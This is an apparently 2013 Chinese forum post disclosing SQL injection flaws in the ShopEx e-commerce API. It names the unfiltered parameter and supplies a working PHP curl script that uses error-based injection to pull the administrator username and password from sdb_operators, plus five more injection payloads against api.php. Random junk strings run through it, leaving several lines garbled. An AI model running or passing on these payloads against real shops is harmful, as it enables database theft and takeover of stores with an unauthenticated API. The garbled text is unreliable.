|
|
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
z' \- P5 ^, y5 E. K" Xcore\api\payment\1.0\api_b2b_2_0_payment_cfg.php5 H! X, `1 v. j& R/ f3 P# O5 M4 r
6 F; l1 V" i) r! ^7 @: z第44行 $data['columns'] 未做过滤导致注入
; y' C* y( J" W7 h) K- E( `2 `. `5 B( b4 g* b
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.
) [% T8 r! ?5 J l! L% S; S
3 E6 e" p/ q9 u1 T注射1:
/ c( a" _ Q$ I0 B( O9 ~! M' t" j
* a' j8 s1 A; c% q: t# f8 xhttp://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#; G4 m/ ]) M7 n; f
' J' {6 u' d& _" W9 ~
注射2:4 I2 c- ^; N- O8 J3 b( S
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}2 v4 o5 B& d1 L( N) J2 B6 \
8 T; S4 X, t, v6 w1 X* w/ |/ b1 x
注射3:
$ A: I9 H( J% N- o6 |' v2 |, r http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx3 F/ @3 k5 Z) q5 M
注射4:/ T; u; F6 b! _! }( p( l* Z
& m1 q$ a, x* D( P1 m3 K4 G
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1
1 N- B; l8 L& N5 z' E( \
$ g$ ?/ L% j; Y( N$ E' S5 y" P7 N* n; N" e0 K% d
注射5:
& U# ^! X4 \- t$ a: S' ]. r http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx
+ [ b( E* v3 }* |
* _$ P9 B$ K" U. a' |5 b
, O7 h, ?" Z8 Y; u
4 u7 ?- C0 |: p( O) ^
' r( a7 T( d( D( x
1 s% X# B# n: B$ y( s$ A0 `6 r O, X! g+ x- N
|
|
发表于 2013-7-27 18:34:27
收藏
支持
反对